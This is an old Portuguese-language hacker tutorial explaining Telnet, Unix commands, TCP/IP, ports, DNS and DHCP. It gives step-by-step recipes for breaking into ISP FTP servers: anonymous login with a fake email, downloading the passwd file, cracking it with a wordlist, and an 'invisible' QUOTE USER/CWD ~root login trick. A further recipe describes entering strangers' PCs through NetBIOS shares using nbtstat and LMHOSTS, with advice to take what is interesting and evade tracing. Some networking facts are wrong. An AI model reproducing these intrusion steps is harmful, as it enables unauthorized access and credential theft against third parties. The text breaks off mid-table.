É O PROTOCOLO INTERNET PARA ESTABELECER CONEXÃO ENTRE COMPUTADORES. ATRAVÉS DESSA CONEXÃO REMOTA, PODE-SE EXECUTAR PROGRAMAS E COMANDOS EM OUTRA MÁQUINA, COMO SE O TECLADO DE SEU COMPUTADOR ESTIVESSE LIGADO DIRETAMENTE A ELA. O VISUAL DE UMA CONEXÃO VIA TELNET É SEMELHANTE AO QUE SE TEM EM BBS’S DE INTERFACE DOS. E A OPERAÇÃO DO COMPUTADOR REMOTO SE DÁ DA MESMA FORMA, OU SEJA, ATRAVÉS DE UMA LINHA DE COMANDOS UNIX OU A PARTIR DE UM MENU DE COMANDOS DISPONÍVEIS QUE SEMPRE SE APRESENTA EM ALGUM LUGAR DA TELA (ESTA ÚLTIMA É A MAIS COMUM ESTRE SERVIDORES QUE PERMITEM ACESSO AO PÚBLICO). O TELNET PODE SER USADO PARA A PESQUISA DE INFORMAÇÕES E TRANFERÊNCIA DE ARQUIVOS – TUDO DEPENDE DO QUE O COMPUTADOR VOCÊ ESTÁ CONECTADO PERMITIR QUE VOCÊ FAÇA. ELE TAMBÉM É MUITO USADO POR OPERADORES DE SISTEMAS (SYSOPS) A FIM DE FAZER ALGUM TIPO DE MANUTENÇÃO (SE VOCÊ PENSA QUE O SYSOP DE SEU PROVEDOR SAI DE CASA TODA VEZ QUE TEM ALGUM PROBLEMA NOS SERVIDORES, ESTÁ MUITO ENGANADO. MUITAS VEZES ELE FAZ A MANUTENÇÃO DE CASA MESMO, VIA TELNET.

PARA FAZER UMA CONEXÃO VIA TELNET É NECESSÁRIO UM PROGRAMA ESPECÍFICO. O WINDOWS 95 JÁ VEM COM UM.

CONECTANDO-SE VIA TELNET: INICIE O TELNET QUE FICA NA PASTA WINDOWS, CLIQUE EM CONECTA, SISTEMA REMOTO E DIGITE NA CAIXA NOME DO HOST O ENDEREÇO AO QUAL DESEJA CONECTAR-SE. NAS CAIXAS "PORTA" E "TIPO DO TERMINAL" SELECIONE TELNET VT100. FEITO ISSO, CLIQUE NO BOTÃO CONECT. ISSO INICIARÁ A CONEXÃO COM O COMPUTADOR REMOTO. FREQUENTEMENTE, AO FINALIZAR A CONEXÃO, O SISTEMA REMOTO PEDE UMA SENHA. DIGITE "GUEST" E APERTE ENTER. ISTO ABRIRÁ AS PORTAS DO COMPUTADOR REMOTO PARA VOCÊ. NA TELA SURGE UMA SÉRIE DE OPÇÕES, PRECEDIDAS DE UM NÚMERO OU LETRA. PARA EXECUTAR ALGUNS DESTES COMANDOS, DIGITE ALGUM DESSES NÚMEROS OU LETRAS E APERTE ENTER. EXPLORE O SISTEMA AO QUAL VOÊ CONECTOU PARA EXERCITAR.

COMANDOS BÁSICOS DE UNIX: A MAIORIA DOS SERVIDORES NÃO PERMITE ACESSO AO PÚBLICO VIA TELNET, PORQUE ESSA É A PRINCIPAL PORTA DE ENTRADA PARA HACKERS. NESTES SERVIDORES NÃO SE ENCONTRAM MENUS QUE FACILITAM A NAVEGAÇÃO PELO SITE OU MENUS DE QUALQUER TIPO, O QUE LEVA A NECESSIDADE DE CONHCER ALGUNS COMANDOS BÁSICOS DE UNIX. SE VOCÊ É WEBMASTER, MUITAS VEZES VAI TER ACESSSO A PROVEDORES DE PRESENÇA, DE FTP E EM ALGUNS CASOS TELNET, PARA EFETUAR ALGUMAS OPERAÇÕES QUE O FTP NÃO PERMITE. SEGUE ABAIXO UMA LISTA QUE LHE SERÃO MUUITO ÚTEIS NESTE CASO:

LS –L: LISTA OS ARQUIVOS DE UM DIRETÓRIO

LS –AL: LISTA TODOS OS ARQUIVOS DE UM DIRETÓRIO, INCLUSIVE OS HIDDEN

CP X Y: COPIA UM ARQUIVO DO DIRETÓRIO X PARA O DIRETÓRIO Y

MV XY: MOVE O ARQUIVO DO DIRETÓRIO X PARA O DIRETÓRIOY

RM X: DELETA O ARQUIVO X

CD XXX: MUDA O DIRETÓRIO ATIVO PARA XXX

CD..: SAI DE UM DIRETÓRIO

MKDIR XXX: CRIA O DIRETÓRIO XXX DENTRI DO DIRETÓRIO ATUAL

RM XXX: REMOVE O DIREÓRIO XXX

OS PROTOCOLOS TCP/IP
PARA ENTENDER COMO ATAQUES FUNCIONAM, É NECESSÁRIO TER UMA PEQUENA NOÇÃO DE COMO TRABALHA A INTERNET, OU PELO MENOS COMO FUNCIONA A SUA BASE DE PROTOCOLOS DE COMUNICAÇÃO. ESTA FAMÍLIA DE PROTOCOLOS É CHAMADA TCP/IP. COMO SABEMOS, CADA COMPUTADOR LIGADO À INTERNET É IDENTIFICADO POR UM NÚMERO DE IP. A MAIORIA DAS PESSOAS CONECTADAS NÃO TEM UM NÚMERO DE IP FIXO, CADA VEZ QUE SE CONECTAM AO PROVEDOR RECEBEM UM NOVO NÚMERO DE IP. APESAR DE UM IP SER UTILIZADO PARA IDENTIFICAR UMA MÁQUINA DENTRE MILHÕES CONECTADAS A INTERNET, ELE NÃO É SUFICIENTE PARA QUE ESTA MÁQUINA TROQUE INFORMAÇÕES COM OUTRAS. POR EXEMPLO,UM MESMO ENDEREÇO DE IP 200.230.137.4 PODE SER UTILIZADO TANTO PARA CONEXÕES VIA WWW, IRC E FTP. COMO UM CLIENTE DE WWW PEDE UM SERVIÇO PARA ELE? E COMO A MÁQUINA 200.230.137.4 DIFERENCIA SEUS DIVERSOS SEVIÇOS OFERECIDOS À INTERNET? É AÍ QUE SURGE UM IMPORTANTE CONCEITO, MUITAS VEZES NEGLIGENCIADO PELOS USUÁRIOS, MAIS É VITAL PARA PREENCHER OS VÁRIOS TIPOS DE ATAQUES DE CRACKERS, QUE É O DA "PORTA". AGORA, ALÉM DE DIFERENCIARMOS AS MÁQUINAS DA INTERNET, PODEMOS IDENTIFICAR OS SERVIÇOS QUE ELAS PRESTAM, E CADA UM DELES É IDENTIFICADO COM UM NÚMERO DIFERENTE. ESTES NÚMEROS SÃO PADRONIZADOS, PARA EVITARMOS CONFUSÃO. POR EXEMPLO, PARA UTILIZAR O SERVIÇO DE WWW DA NOSSA MÁQUINA 200.230.137.4, BASTA ABRIRMOS UMA CONEXÃO PELA PORTA 80. O FTP UTILIZA A PORTA 21, O ICQ USA PORTAS NA FAIXA 1000-2000, E IRC PORTAS 6666, 6667, 6668. EXISTEM CERCA DE 65535 NÚMEROS DISPONÍVEIS PARA SEREM UTILIZADOS EM UMA ÚNICA MÁQUINA. QUANTO MAIS SERVIÇOS A MÁQUINA OFERECE, MAIS PORTAS (E SEUS NÚMEROS) SÃO DISPONIBILIZADOS. ATÉ MESMO A SUA MÁQUINA WINDOWS 95/98, QUE APARENTEMENTE NÃO OFERECE SERVIÇO NENHUM, TEM PORTAS ABERTAS.

A COLETA DE DADOS
UM ATAQUE BEM SUCEDIDO A UM COMPUTADOR É AQUELE QUE EXPLORA A VULNERABILIDADE EXISTENTE EM UM PROGRAMA OU SERVIÇO RODANDO NA MÁQUINA. COMO JÁ DISSEMOS ANTES, A MAIORIA DOS SERVIÇOS É ACESSADO ATRAVÉS DA CAMADATCP/IP, E SÃO IDENTIFICADOS POR UM NÚMERO DE PORTA. ATAQUES AO PRÓPRIO MECANISMO DE MANIPULAÇÃO DO PROTOCOLO DO TCP/IP TAMBÉM SÃO FREQUENTES, COMO IREMOS VER A SERGUIR.

PARA QUE UM INVASOR POSSA EXPLORAR AS FALHAS DA SERGURANÇA NOS VÁRIOS SISTEMAS DE SUA MÁQUINA, ELE PRECISA SABER ANTES O QUE ESTÁ DISPONÍVEL. EXSTEM DOIS MÉTODOS BASTANTE UTILIZADOS PARA ESTE TIPO DE COLETA DE DADOS. A VARREDURA DE PORTAS (PORT SCAN) E A IMPRESSÃO DIGITEL (FINGERPRINT) DO SISTEMA OPERACIONAL.

PORT SCANS

USANDO PROGRAMAS ESPECIAIS, O INVADOR LANÇA SONDAS (PACOTES IP ESPECIAIS), TENTANDO ESTABELECER CONEXÕES COM CADA UMA DAS 65535 PORTAS DO SEU COMPUTADOR. SE EXISTE ALGUM SERVIÇO ASSOCIADO A ALGUMA PORTA, ELE IRÁ RESPONDER. DESTA MANEIRA, O INVASOR CONSEGUE SABER, EM POUCOS SEGUNDOS, O QUE ESTÁ RODANDO EM SUA MÁQUINA.

IMPRESSÃO DIGITAL

ATRAVÉS DO ENVIO DE UMA SEQUENCIA ESPECIAL DE PACOTES IP A UM SITE ESPECÍFICO, PODE-SE DETECTAR QUE SISTEMA OPERACIONAL ESTÁ RODANDO ANALIZANDO OS PACOTES QUE ELE ENVIA DE VOLTA. COM POSSE DESSAS INFORMAÇÕES, ELE JÁ SABE QUE FERRAMENTAS UTILIZAR PARA TENTAR INVADIR OU VANDALIZAR O SEU MICRO. E É NESTE PONTO QUE VOCÊ DEVE PRESTAR MUITA ATENÇÃO. QA INFORMAÇÃO É A ALMA DO NEGÓCIO. A INVASÃO DE SISTEMAS É BASICAMENTE UMA TAREFA DE PESQUISA E COLETA DE DADOS. QUANTO MAIS INFORMADO E ATUALIZADO VOCÊ ESTIVER, MENOS CHANCES TERÁ DE RECEBER UM ATAQUE NO FUTURO.

INVADINDO FTP´S
ATAQUE POR FTP (ML HACKING)

INGREDIENTES:

COMPUTADOR LIGADO À INTERNET
PROGRAMA FTP.EXE
UM CÉREBRO DE DOIS NEURÔNIOS NO MÍNIMO, SE NÃO O PROGRAMA NÃO RODA DIREITO.
E UM PROVEDOR DE INTERNET PEQUENO A GOSTO.
MODO DE PREPARO:

LIGUE O COMPUTADOR.
CONECTE-SE À INTERNET.
CLIQUE EM INICIAR OU START, DEPENEENDO DO RUINDOWS.
CLIQUE EM EXECUTAR.
DIGITE FTP E CLIQUE EM OK.
DEPOIS O PROGRAMA COMEÇARÁ.
AÍ VOCÊ VERÁ "FTP>"
DAÍ DIGITE OPEN www.provedor .COM.BR
NO LOGIN DIGITE: "ANONYMOUS"
NA SENHA DIGITE QUALQUER E-MAIL QUE NÃO SEJA O SEU E TEM QUE SER UM QUE NÃO CHAME MUITO A ATENÇÃO.
VOCÊ ESTARÁ DENTRO DO PROVEDOR ESCOLHIDO. E AGORA? O QUE FAZER? EU IREI LEVÁ-LO AO ARQUIVO QUE CONTÉM A SENHA, MAS DEPOIS VICÊ PODERÁ FAZER O QUE QUISER EM OUTRO PROVEDOR.
DIGITE LS –AFL PARA LISTAR TODOS OS ARQUIVOS E DIRETÓRIOS DO PROVEDOR.
SE HOUVER O DIRETÓRIO ETC, DIGITE CD ETC, PARA MUDAR O DIRETÓRIO, SE NÃO TIVER DIGITE CLOSE.
DIGITE LS –LA. SE HOUVER O ARQUIVO PASSWD DIGITE GET PASSWD, SE NÃO DIGITE CLOSE.

PRONTO. TERMINADA A INVASÃO PEGUE O PROGRAMA JACK QUE TIRA AS SENHAS DO ARQUIVO.

COLOCANDO NO PW FILE: PASSWD E NA OUTRA ENTRADA DE DADOS, QUE EU ESQUECI O NOME COLOQUE A SUA WORDLIST.

SE VOCÊ NÃO TIVER NENHUM PROGRAMA DE FTP USE O DO MS-DOS. VÁ AO PROMPT E DIGITE FTP. IRÁ APARECER O PROMPT FTP>, DIGITE OPEN, IRÁ ABRIR OUTRO PROMPT. DITE ENTÃO O ENDEREÇO DO HOST PU O SEU IP.

AO CONECTAR ELE PEDIRÁ A SENHA E A PASSWORD, TENTE USAR OS PASSWORDS DO UNIX, SE NÃO DER VOCÊ PODE ENTRAR INVISÍVEL. COMO EMTRAR INVISÍVEL?

NOLOGIN PRECIONE ENTER, NO PASSWORD PRECIONE NOVAMENTE. DEPOIS DIGITE "QUOTE USER FTP", DÊ UM ENTER E DIGITE "QUOTE CWD~ROOT", PRECIONE ENTER NOVAMENTE E DIGITE "QUOTE PASS FTP". PRONTO, VOCÊ ESTÁ HACKEANDO...

NÃO TENTE HACKEAR USANDO O USER NORMAL DE FTP´S, QUE É LOGIN ANONYMOUS PASSWORD E-MAIL, POIS SERÁ APLICADO O MODO DE PROTEÇÃO...

MEU DEUS, EU ENTREI, E AGORA O QUE EU FAÇO?

AO ENTRAR VOCÊ VAI ESTAR NO DIRETÓRIO DO LOGIN, TIPO HOMEROOT. DAÍ, PARA VER A LISTA DE USERS VOCÊ VOLTA UM DIR E DIGITE DIRHOME, E CADA DIR É UM USUÁRIO. NÃO TENTEM PEGAR AS SENHAS POIS ESTÃO CRIPTOGRAFADAS, POIS A MAIORIA DOS USERS USA A MESMA SENHA LOGIN. SE VOCÊ NÃO SOUBER OS COMANDOS DE FTP, DIGITE ? E TECLE ENTER. DAÍ, É SÓ HACKEAR. NUNCA FIQUE MAIS DO QUE 5 MINUTOS EM UM PROVEDOR, SE NÃO ELE CAÇARÁ O SEU IP, DAÍ É CADEIA!!!!!!.

FTP DO DOS
COMANDOS
FUNÇÕES

APPEND
ACRESCENTAR UM ARQUIVO

ASCII
DEFINIR UM TIPO DE TRANFERÊNCIA ASCII

BELL
EMITIR UM AVISO SONORO AO TÉRMINO DO COMANDO

BINARY
DEFINIR TIPO DE TRANSFERÊNCIA BINÁRIA

BYE
TERMINAR SEÇÃO DE FTP E SAIR

CD
ALTERAR A PASTA DE TRABALHO REMOTA

CLOSE
TERMINAR SESSÃO DE FTP

DELETE
EXCLUIR PASTAS DE TRABALHO REMOTA

DEBUG
LIGAR/DESLIGAR MODO DE DEPURAÇÃO

DIR
LISTAR CONTEÚDO DA PASTA REMOTA

DISCONNECT
TERMINAR SESSÃO DE FTP

GET
RECEBER ARQUIVO

GLOB
LIGAR/DESLIGAR O MASCARAMENTO EM NOME DE ARQUIVOS LOCAIS

HASH
LIGAR/DESLIGAR IMPRESSÃO "#" PARA CADA BUFFER TRANSFERIDO

HELP
AJUDA DO FTP

LCD
ALTERAR A PASTA DE TRABALHO LOCAL

LITERAL
ENVIAR UM COMANDO DE FTP ARBITÁRIO

LS
LISTAR O CONTEÚDO DA PASTA REMOTA

MDELETE
EXCLUI VÁRIOS ARQUIVOS

MDIR
LISTAR O CONTEÚDO DE VÁRIAS PASTAS REMOTAS

M GET
OBTER VÁRIOS ARQUIVOS

MKDIR
CRIA UMA PASTA NA MÁQUINA NA MÁQUINA REMOTA

MLS
LISTAR O CONTEÚDO DE VÁRIAS PASTAS REMOTAS

MPUT
ENVIAR VÁRIOS ARQUIVOS

OPEN
CONECTAR AO FTP REMOTO

PROMPT
FORÇAR PROMPT INTERATIVO EM MÚLTIPLOS COMANDOS

PUT
ENVIAR UM ARQUIVO

PWD
IMPRIMIR A PASTA DE TRABALHO NA MÁQUINA REMOTA

QUIT
TERMINAR A SESSÃO DE FTP E SAIR

QUOT
ENVIAR UM COMANDO ARBITRÁRIO

RECV
RECEBER ARQUIVO

REMOTEHELP
OBTER AJUDA A PARTIR DO SERVIDOR REMOTO

RENAME
RENOMEAR ARQUIVO

RMDIR
REMOVER PASTA DA MÁQUINA REMOTA

SEND
ENVIAR ARQUIVO

STATUS
MOSTRAR STATUS ATUAL

TRACE
LIGAR/DESLIGAR RASTREAMENTO DE PACOTES

TYPE
DEFINIR O TIPO DE TRANSFERÊNCIA DE ARQUIVOS

USER
ENVIAR INFORMAÇÕES DE NOVO USUÁRIO

VERBOSE

Invasão por IP
Passa-a-passo: 1º- Certifique-se de que você possui este programa nbstat:

2º- Vá ao Prompt do MS-DOS.

3º- Digite: nbtstat -a o IP do cara que você quer invadir

4º- Aparecerá se a pessoa tiver compartilhamento de arquivos as pastas do PC dela. Se não aparecerá : Host Not Found (o foda é que não da para invadir o computador de certos caras por causa disso então não se entusiasme tanto pois só da para invadir aquelas pessoas que tem no PC compartilhamento de arquivos as pastas)

5º- Caso apareça um monte de nomes esquisitos com isso antes : "<03>", você deve pegar o nome do negócio que estiver com <03> atrás do nome.

6º- Crie um arquivo .txt com o nome de LMHOSTS. Digite lá : O IP do cara NetBios dele . O NetBios é aquele nome esquisite que tem o atras. (Digite exatamente daquela forma que eu digitei)

7º- Mapeie sua unidade de disco de forma que a máquina do cara se torne parte de seu PC.

8º- Vá em "Iniciar", "Executar" e digite: //IP_do_cara e ponha "OK"

9º- Pronto! Você invadiu por IP!

10º- Conselho : Nunca apague nem modifique NADA somente fuce bastante nas coisas do lammaH e se achar algo interessante pega para você. OBS: Tem algumas pessoas que renomeiam o arquivo vnbt.386 no windowssystem para que se alguem tente te nukar ou invadir não consiga... ; pois bem você vai ter que renomear o seu arquivo senão não da para invadir.

PROTOCOLOS DE REDE
TCP/IP SE REFERE AO CONJUNTO DE PROTOCOLOS USADOS NA INTERNET. ELE INCLUI UMA SÉRIE DE PADRÕES QUE ESPECIFICAM COMO OS COMPUTADORES VÃO SE COMUNICAR E CRIA CONVENÇÕES PARA INTERCONECTAR REDES PARA O ROUTEAMENTO ATRAVÉS DESSAS CONEXÕES.

OS PROTOCOLOS DA INTERNET (IP), SÃO UM RESULTADO DO PROJETO DA DARPA, SOBRE CONECTIVIDADE ENTRE REDES NO FINAL DOS ANOS 70. ELE FOI UTILIZADO EM TODAS AS REDES DE LONGA DOSTÂNCIA DO SISTEMA DE DEFESA DOS EUA EM 1983, MAS NÃO FOI RAPIDAMENTE ACEITO ATÉ SER INCORPORADO AO BSD UNIX 4.2.

A POPULARIDADE DO TCP/IP É BASEADO EM:

ESTRUTURA CLIENTE SERVIDOR ROBUSTA: O TCP/IP É UMA ÓTIMA PLATAFORMA CLIENTE SERVIDOR, ESPECIALMENTE EM AMBIENTES WAN.

COMPARTILHAMENTO DE INFORMAÇÕES: MILHARES DE INFORMAÇÕES MILITARES, EDUCACIONAIS, CIENTÍFICAS, E COMERCIAIS COMPARTILHAM DADOS, CORREIO ELETRÔNICO E OUTROS SERVIÇOS DA INTERNET USANDO O TCP/IP. AMPLA DISPONIBILIDADE. IMPLEMENTAÇÕES DO TCP/IP ESTÃO DISPONÍVEIS EM PRATICAMENTE TODOS OS SISTEMAS OPERACIONAIS POPULARES. SEU CÓDIGO É AMPLAMENTE DISPONÍVEL EM VÁRIAS IMPLEMENTAÇÕES. FABRICANTES DE BRIDGES, ROUTERS E ANALIZADORES DE REDES OFERECEM SUPORTE PARA O TCP/IP EM SEUS PRODUTOS.

CONCEITOS

EXISTEM ALGUNS CONCEITOS QUE SÃO IMPRECINDÍVEIS EM RELAÇÃO AO TCP/IP E DE REDES QUE O UTILIZAM.

NÚMERO

EXISTEM ALGUMAS ANALOGIAS ENTRE COMPUTADORES E TELEFONES E O NÚMERO DE IP É UMA DELAS. VOCÊ PODE IMAGINAR O NÚMERO DE IP COMO UM NÚMERO DE TELEFONE COM TODOS OS CÓDIGOS DE DISCAGEM INTERNACIONAL. ISTO SE SIGNIFICA QUE QUALQUER MÁQUINA PODE SE CONECTAR A OUTRO USANDO O NÚMERO DE IP, BASTADO QUE EXISTA APENAS UM CAMINHO ENTRE AS DUAS. ALÉM DISSO, TODA MÁQUINA NA REDE TEM DE TER UM NÚMERO DE IP.

ISTO TAMBÉM SIGNIFICA QUE DUAS MÁQUINAS NA MESMA REDE NÃO PODEM TER O MESMO NÉMERO DE IP. ESTA RESTRIÇÃO SÓ OCORRE PARA MÁQUINAS NA MESMA REDE, POIS MÁQUINAS NUMA REDE NÃO CONECTADA USUALMENTE TEM NÚMERO DE IP IGUAIS, POR ALGUMAS CAUSAS TÉCNICAS. NO CASO DA ANALOGIA COM TELEFONES, IMAGINE DUAS PESSOAS MORANDO EM PAÍSES DIFERENTES QUE POSSUAM O MESMO NÚMERO DE TELEFONES (APENAS OS NÚMEROS LOCAIS). NESSE CASO NÃO HÁ CONFLITO.

O NÚMERO DE IP TEM 4 BYTES DE TAMANHO E TEM UM FORMATO ESPECÍFICO XXX.XXX.XXX.XXX (EXEMPLO: 200.212.235.122). ISSO SIGNIFICA QUE CADA AGRUPAMENTO PODE IR DE 0 À 255 (POIS ESSA É A CAPACIDADE DE 1 BYTE)

MÁSCARA

EXISTEM TRÊS CLASSES DE ENDEREÇOS IP: CLASSES A, B, C. A DIFERENÇA ENTRE AS CLASSES É A FORMA DE COMO O ENDEREÇO DE IP É INTERPRETADO. O NÚMERO DE IP É DIVIDO EM DUAS PARTES: O ENDEREÇO DA REDE EO ENDEREÇO DA SUBREDE. CONSIDERE O NÚMERO DE IP DA SEGUINTE FORMA: W.X.Y.Z.

CLASSE
N º DE IP
INDICADOR DA REDE
INDICADOR DA SUB REDE
NºDE REDES DISPONÍVEIS
NºDE SUB REDES DISPONÍVEIS

A
1.126
w
x.y.z
126
16,777,214

B
128.191
w.x
y.z
16,384
65,534

C
192.223
w.x.y
z
2,097,151
254

OBS: O ENDEREÇO 192.168 É RESERVADO PARA USO EM REDES INTERNAS, O ENEREÇO 127 É UTILIZADO PARA TESTES DE LOOP BACK E OS ACIMA DE 224 SÃO RESERVADOS PARA PROTOCOLOS ESPECIAIS.

UMA SUB REDE É UMA REDE LIGADA DIRETAMENTE ATRAVÉS DE UMA REDE PERTENCENTE À INTERNET. A REDE PERTENCENTE RECEBE UM NÚMERO DE IP E DITRIBUI O NÚMERO DE IP DENTRO DE SUA SUB REDE. AS CLASSES APENAS DEFINEM QUEANTAS SUB REDES UM NÚMERO DE IP TEM. DE ACORDO COM A TABELA, EXISTEM 126 NÚMEROS DE IP DQA CLASSE A E CADA UM DELES PODE TER CERCA DE 16.777.214 SUB REDES. VOCÊ LOGO PODE IMAGINAR QUE NÃO EXISTAM ENDEREÇOS DE CLASSE A E B NA INTERNET, E QUE OS DA CLASSE C ESTÃO ACABANDO, A IETF ESTÁ ESTUDANDO A EXPANSÃO DESSES NÚMEROS.

AS MÁSCARAS DE SUB REDE IDENTIFICAM A CLASSE DO NÚMERO DE IP. A PRIMEIRA VISTA PARECE DESNECESSÁRIO, POIS BASTA OLHAR O PRIMEIRO NÚMERO DO IP PARA DETERMINAR A CLASSE. MAS ACONTECE QUE UM NÚMERO DE IP DA CLASSE A PODE FUNCIONAR COMO UM DA CLASSE B OU CLASSE C, DEPENDENDO DA ESTRUTURA INTERNA DA SUA SUB REDE. UM EXEMPLO: IMAGINE UMA EMPRESA COM 200 FILIAIS NO BRASIL CONECTADAS POR UMA REDE PRÓPRIA. A MATRIZ TEM UM NÚMERO DE IP DE CLASSE A, DIGAMOS 100 E DISTRIBUI AS SUAS SUB REDES DA SEGUINTE FORMA:

100.1.0.0
Matriz

100.2.0.0
Filial 1

100.3.0.0
Filial 2

100.201.0.0
Filial 200





PARA AS FILIAIS, O NºDE IP (EX: 100.201.0.0) É DE CLASSE B, POIS SÓ TEM 16.384 SUBREDES DISPONÍVEIS, EMBORA COMECE COM 100. DENTRO DAS FILIAIS AINDA É POSSÍVEL SE DISTRIBUIR SUB REDES, AS QUAIS TERIAM NÚMEROS DE IP CLASSE C.

PARA QUE O ROTEAMENTO FUNCIONE CORRETAMENTE, OS COMPUTADORES PRECISAM SABER QUAL A CLASSE DO NÚMERO DE IP, E ELAS SÃO AS SEGUINTES:


Classe
Máscara de Sub-rede

A
255.0.0.0

B
255.255.0.0

C
255.255.255.0

GATEWAY
GATEWAY PADRÃO É A MÁQUINA PÁRA QUEM PEDIMOS AJUDA QUANDO NÃO CONSEGUIMOS ACHAR UMA OUTRA MÁQUINA NA REDE. FUNCIONA ASSIM: QUANDO UMA MÁQUINA DA REDE PRECISA SE COMUNICAR COM OUTRA, ELA EMITE UM PEDIDO DE CONEXÃO (ESSE PEDIDO É FEITO ATRAVÉS DO BROADCASTING, OU SEJA, A MÁQUINA QUE ENVIA O PEDIDO A TODA A REDE, E APENAS A MÁQUINA DESTINO RESONDE), E AGUARDA UMA RESPOSTA. SE ELA NÃO VIER, ELA ENTRA EM CONTATO COM O GATEWAY PADRÃO E SOLICITA QUE O MESMO CONECTE COM A MÁQUINA DESTINO. SE O GATEWAY CONSEGUIR CONECTAR À MÁQUINA DESTINO, ELE FICA COMO INTERMEDIADOR DESSA CONEXÃO, CASO CONTRÁRIO, ELE VISA A MÁQUINA SOLICITANTE QUE NÃO FOI POSSÍVEL ENCONTRAR A MÁQUINA DESTINO. ESSA ESTRUTURA DE PROCURA VISA DIMINUIR O TRÁFEGO DESNECESSÁRIO NA REDE. IMAGINE SÓ SE TODA A CONEXÃO REALIZADA NA INTERNET (E TODAS AS REDES CONECTADAS A INTERNET) FOSSE ENVIADA A TODOS OS COMPUTADORES LIGADAS A ELA. SERIA UM TRÁFEGO MUITO GRANDE. AO INVÉS DISSO, O BROADCAST É DIVIDIDO EM NÍVEIS, PRIMEIRO NA LAN (LOCAL AREA NETWORK OU REDE LOCAL) DEPOIS NA WAN DE SUA CIDADE OU ESTADO, DEPOIS NA WAN NACIONAL ATÉ CHEGAR NA WAN INTERNACIONAL. REDUZ-SE DESSE MODO TODO O TRÁFEGO INTERNO ÀS WANS E LANS ALIVIANDO AS LINHAS DE CONEXÃO.

DNS
ESSAS 3 LETRAS NÃO SEIGNIFICAM MUITO PARA A MAIORIA DAS PESSOAS, MAS ELAS DIGNIFICAM DOMAIN NAME SYSTEM. ESSAS 3 PALAVRAS TAMBÉM NÃO SIGNIFICAM COISA ALGUMA PARA A MIORIA DAS PESSOAS, POR ISSO, VAMOS À ANALOGIA COM O TELEFONE. QUANDO VOCÊ DESEJA TELEFONAR PARA A LOJA DA ESQUINA, VOCÊ CONSULTA O CATÁLOGO, DESCOBRE O TELEFONE DE LÁE LIGA. VOCÊ NÃO CONSEGUE TELEFONAR PARA ALGUM LUGAR SE NÃO SOUBER O NÚMERO. NA REDE TCP/IP ACONTECE A MESMA COISA. OS USUÁRIOS NÃO DECORAM O NÚMERO DE IP DAS MÁQUINAS, E SIM OS NOMES. MAS PARA SE ALCANÇAR UMA MÁQUINA NA REDE PRECISAMOS DO SEU NÚMERO DE IP. PARA RESOLVER ISSO FOI CRIADO O DNS, UM SERVIÇO DISPONÍVEL NA REDE QUE, DADO UM NOME DE MÁQUINA, ELE RETORNA O NÚMERO DE IP DA MESMA. EXISTE UMA PARTICULARIDADE AQUI. NO CASO DA REDE LOCAL ESTAR CONECTADA A ALGUMA OUTRA, É RECOMENDÁVEL QUE O SERVIDOR DNS, SEJA EXECUTADO NA MÁQUINA DE LIGAÇÃO ENTRE AS DUAS REDES (O GATEWAY), PARA CASO DE O NOME REQUISITADO NÃO EXISTIR NA REDE LOCAL , O DNS POSSA PEDIR AO SERVIDOR DNS DA OUTRA REDE PARA PESQUISAR O TAL NOME.

O WINDOWS NT OFERECE UM SERVIÇO SEMELHANTE, O WINS (WINDOWS INTERNET NEME SYSTEM OU SISTEMA DE NOMES DA INTERNET DO WINDOWS). A PRINCIPAL DIFERENÇA ENTRE OS DOIS É QUE O DNS USA UMA TABELA ESTÁTICA, E O WINS USA UMA TABELA DINÂMICA. NO CASO DO SERVIDOR DNS RODAR NUMA MÁQUINA DO WINDOWS NT É RECOMENDÁVEL QUE ELE SEJA SUSTIUÍDO PELO WINS.

DHCP
MAIS UM CASO DE LETRAS QUE NÃO SIGNIFICAM NADA PARA A MIORIA DOS USUÁRIOS. MAS INFELIZMENTE NÃO EXISTE UMA BOA ANALOGIA PARA O DHCP, PORTANTO VAMOS DIRETO AO ASSUNTO. DHCP SIGNICA "DINAMIC HOST CONFIGURATION PROTOCOL", OU SEJA: PROTOCOLO DE CONFIGURAÇÃO DE HOST DINÂMICO. NIAM REDE TCP/IP, TODO COMPUTADOR, TODO COMPUTADOR TEM DE TER UM IP DISTINTO. ISSO SIGNIFICA QUE ANTES DE COLOCAR UMA NOVA MÁQUINA NA REDE, O ADMINISTRADOR TERIA DE IDENTIFICAR QUAIS NÚMEROS ESTÃO SENDO UTILIZADOS PARA ESCOLHER UM NÚMERO ADEQUADO PARA A NOVA MÁQUINA. EM PEQUENAS REDES ISSO É POSSÍVEL SER FEITO, MAS EM GRANDES REDES ISSO SE TORNA UMA TAREFA TEDIOSA E SUJEITA A FALHAS. PARA EVITAR ISSO FOI CRIADO O DHCP. QUANDO UMA MÁQUINA ENTRA NA REDE, ELA PROCURA O SERVIDOR DHCP (CUJO NÚMERO DE IP FOI PREVIAMENTE FORNECIDO) E SOLICITA UM NÚMERO DE IP PARA SI PRÓPRIA. O SERVIDOR VERIFICA QUAL O NÚMERO DISPONÍVEL, INFORMA AO SOLICITANTE ESSE NÚMERO E O TORNA INDISPONÍVEL PARA FUTURAS SOLICITAÇÕES. DESSA MANEIRA A ADMINISTRAÇÃO DOS NÚMEROS DE IP SÃO FEITAS AUTOMATICAMENTE E NÃO EXISTEM PROBLEMAS DE CONFLITO. QUANDO A MÁQUINA SOLICITANTE SAI DA REDE, O SERVIDOR DHCP TORNA ESSE NÚMERO DISPONÍVEL NOVAMENTE.

PORTAS
UMA PORTA PODE SER VISTA COMO UM CANAL DE COMUNICAÇÕES PARA UMA MÁQUINA. PACOTES DE INFORMAÇÕES CHEGANDO A UMA MÁQUINA NÃO SÃO APENAS ENDEREÇADAS À MÁQUINA, E SIM A MÁQUINA NUMA DTERMINADA PORTA. VOCÊ PODE IMAGINAR UMA PORTA COMO SENDO UM CANAL DE RÁDIO, COM A DIFIRENÇA FUNDAMENTAL DE QUE UM COMPUTADOR PODE "OUVIR" TODOS OS 65000 CANAIS POSSÍVEIS AO MESMO TEMPO.

ENTRETANTO, UM COMPUTADOR GERALMENTE NÃO ESTÁ OUVINDO EM TODAS AS PORTAS, ELE ESCUTA A ALGUMAS PORTAS ESPECÍFICAS. E ELE NÃO VAI RESPONDER A UM PEDIDO A UMA PORTA QUE ELE NÃO ESTEJA ESCUTANDO.

EXISTEM UMA SÉRIE DE PORTAS PRÉ DEFINIDAS PARA CERTOS SERVIÇOS QUE SÃO ACEITOS UNIVERSALMENTE. AS PRINCIPAIS SÃO:

SERVIÇO
PORTA
DESCRIÇÃO

FTP
21
PROTOCOLO DE TRANSFERÊNCIA DE ARQUIVOS

TELNET
23
PARA SE CONECTAR REMOTAMENTE A UM SERVIDOR

SMTP
25
